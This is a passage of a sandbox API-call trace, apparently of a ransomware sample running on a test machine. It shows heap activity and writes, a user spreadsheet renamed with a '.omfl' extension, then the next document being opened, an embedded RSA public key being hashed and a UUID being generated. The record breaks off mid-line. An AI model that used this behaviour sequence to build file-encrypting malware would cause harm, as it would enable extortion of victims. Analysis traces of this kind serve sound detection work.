[0131.107] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10c) returned 0x74e3210 [0131.107] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8c0 | out: hHeap=0x4970000) returned 1 [0131.107] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x75038a0 [0131.107] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16f20 | out: hHeap=0x4970000) returned 1 [0131.108] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x200) returned 0xdcfc0b8 [0131.108] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503788 | out: hHeap=0x4970000) returned 1 [0131.108] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24578 [0131.108] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0131.108] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3088 | out: hHeap=0x4970000) returned 1 [0131.108] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24890 | out: hHeap=0x4970000) returned 1 [0131.108] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24578 | out: hHeap=0x4970000) returned 1 [0131.108] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf128 | out: hHeap=0x4970000) returned 1 [0131.108] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x75038a0 | out: hHeap=0x4970000) returned 1 [0131.108] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce0a50 | out: hHeap=0x4970000) returned 1 [0131.108] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfc0b8 | out: hHeap=0x4970000) returned 1 [0131.108] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0131.108] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0131.108] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16f50 | out: hHeap=0x4970000) returned 1 [0131.108] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa860 | out: hHeap=0x4970000) returned 1 [0131.108] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0131.108] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf068 | out: hHeap=0x4970000) returned 1 [0131.108] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16f38 | out: hHeap=0x4970000) returned 1 [0131.108] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16f08 | out: hHeap=0x4970000) returned 1 [0131.109] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17560 | out: hHeap=0x4970000) returned 1 [0131.109] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb28 | out: hHeap=0x4970000) returned 1 [0131.109] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24788 | out: hHeap=0x4970000) returned 1 [0131.109] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16ef0 | out: hHeap=0x4970000) returned 1 [0131.109] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd348f0 | out: hHeap=0x4970000) returned 1 [0131.109] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd20488 | out: hHeap=0x4970000) returned 1 [0131.109] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24368 | out: hHeap=0x4970000) returned 1 [0131.109] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757ca08 | out: hHeap=0x4970000) returned 1 [0131.109] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503670 | out: hHeap=0x4970000) returned 1 [0131.109] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdf28 | out: hHeap=0x4970000) returned 1 [0131.109] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0131.109] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdb88 | out: hHeap=0x4970000) returned 1 [0131.109] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08ea8 | out: hHeap=0x4970000) returned 1 [0131.109] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e4b90 | out: hHeap=0x4970000) returned 1 [0131.109] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0131.109] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0131.109] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd35410*, nNumberOfBytesToWrite=0x17ed5, lpNumberOfBytesWritten=0xe00fb14, lpOverlapped=0x0 | out: lpBuffer=0xdd35410*, lpNumberOfBytesWritten=0xe00fb14*=0x17ed5, lpOverlapped=0x0) returned 1 [0131.110] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd35410 | out: hHeap=0x4970000) returned 1 [0131.110] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x17eda, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.110] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0131.110] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24260 | out: hHeap=0x4970000) returned 1 [0131.110] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5f60 [0131.110] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x428) returned 0x757b558 [0131.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", cchWideChar=-1, lpMultiByteStr=0x757b558, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", lpUsedDefaultChar=0x0) returned 41 [0131.110] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x430) returned 0xdd19550 [0131.110] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757b558 | out: hHeap=0x4970000) returned 1 [0131.110] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5f60 | out: hHeap=0x4970000) returned 1 [0131.110] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd19550*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd19550*, lpNumberOfBytesWritten=0xe00fb50*=0x28, lpOverlapped=0x0) returned 1 [0131.110] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd19550 | out: hHeap=0x4970000) returned 1 [0131.111] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0131.111] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0131.111] CloseHandle (hObject=0x5c8) returned 1 [0131.121] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3088 [0131.121] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x890) returned 0xdd29950 [0131.122] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3088 | out: hHeap=0x4970000) returned 1 [0131.122] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WaIalkjw85ztPa1.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\waialkjw85ztpa1.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WaIalkjw85ztPa1.xlsx.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\waialkjw85ztpa1.xlsx.omfl")) returned 1 [0131.123] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0131.123] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0131.123] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.125] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd14728 | out: hHeap=0x4970000) returned 1 [0131.125] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66567110, ftCreationTime.dwHighDateTime=0x1d5e280, ftLastAccessTime.dwLowDateTime=0xc287dd0, ftLastAccessTime.dwHighDateTime=0x1d5e340, ftLastWriteTime.dwLowDateTime=0xc287dd0, ftLastWriteTime.dwHighDateTime=0x1d5e340, nFileSizeHigh=0x0, nFileSizeLow=0xdc2b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xBFE.odp", cAlternateFileName="")) returned 1 [0131.126] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5f60 [0131.126] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8e) returned 0xdd14728 [0131.126] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5f60 | out: hHeap=0x4970000) returned 1 [0131.126] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xBFE.odp") returned=".odp" [0131.126] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xBFE.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xbfe.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0131.126] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=56363) returned 1 [0131.126] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0131.129] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0xdc05, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.129] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0131.130] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0131.130] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0131.130] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.130] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0xdc2b, lpOverlapped=0x0) returned 1 [0131.131] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.131] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0131.131] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.131] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.131] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3088) returned 1 [0131.132] CryptCreateHash (in: hProv=0x49d3088, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0131.132] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0131.132] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0131.132] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0131.132] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0131.132] GetLastError () returned 0x0 [0131.132] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0131.133] CryptReleaseContext (hProv=0x49d3088, dwFlags=0x0) returned 1 [0131.133] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0131.133] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0131.133] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0131.133] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0131.133] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0131.133] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0131.133] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0131.133] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xdc30) returned 0xdd35410 [0131.133] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0131.133] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0131.133] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0xdd0bd00 [0131.133] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0131.133] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0x74e4b90 [0131.133] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08ea8 [0131.133] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd348f0 [0131.134] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16ef0 [0131.134] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd34938 [0131.134] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16f08 [0131.134] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16f38 [0131.134] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0131.134] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16f50 [0131.134] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x24) returned 0xdd0d930 [0131.134] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x158) returned 0xdd27968 [0131.134] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd20488 [0131.134] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0131.134] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16f38 | out: hHeap=0x4970000) returned 1 [0131.134] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16f50 | out: hHeap=0x4970000) returned 1 [0131.134] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0131.134] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0131.134] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0131.134] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0131.134] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e58 [0131.134] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16f50 [0131.134] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cdb88 [0131.134] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd16f38 [0131.134] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e78 [0131.134] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0x74e3210 [0131.134] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9278 [0131.134] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08cc8 [0131.134] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0131.134] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0131.134] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf068 [0131.134] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0131.134] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0131.135] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16f50 | out: hHeap=0x4970000) returned 1 [0131.135] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0131.135] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16f38 | out: hHeap=0x4970000) returned 1 [0131.135] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdb88 | out: hHeap=0x4970000) returned 1 [0131.135] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0131.135] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0131.135] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0131.135] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08ea8 | out: hHeap=0x4970000) returned 1 [0131.135] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd20488 | out: hHeap=0x4970000) returned 1 [0131.135] GetCurrentThreadId () returned 0x618 [0131.135] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24260 [0131.135] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 0xdd2ccd0 [0131.135] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2c) returned 0x750cb28 [0131.135] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3088 [0131.135] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x148) returned 0xdd17560 [0131.135] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0131.135] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0131.135] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24368 [0131.135] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.135] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.135] GetCurrentThreadId () returned 0x618 [0131.135] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.135] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.135] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xeb) returned 0x74e3210 [0131.135] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.135] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.135] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.135] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.136] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0131.136] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24788 [0131.136] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0131.136] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4c) returned 0x757ca08 [0131.136] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0131.136] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24578 [0131.136] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0131.136] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0131.136] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.136] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0131.136] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa860 [0131.136] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8e0 [0131.136] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8c0 [0131.136] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8b0 [0131.136] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8a0 [0131.136] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa890 [0131.136] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16f38 [0131.136] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa860 | out: hHeap=0x4970000) returned 1 [0131.136] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa860 [0131.136] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.136] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0131.136] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8f0 [0131.136] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa900 [0131.136] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8d0 [0131.136] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16f50 [0131.136] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa900 | out: hHeap=0x4970000) returned 1 [0131.136] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cdb88 [0131.136] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8f0 | out: hHeap=0x4970000) returned 1 [0131.136] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16f20 [0131.136] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8d0 | out: hHeap=0x4970000) returned 1 [0131.137] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16a40 [0131.137] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.137] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e98 [0131.137] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8a0 | out: hHeap=0x4970000) returned 1 [0131.137] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16848 [0131.137] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.137] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd167e8 [0131.137] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0131.137] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16f68 [0131.137] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, 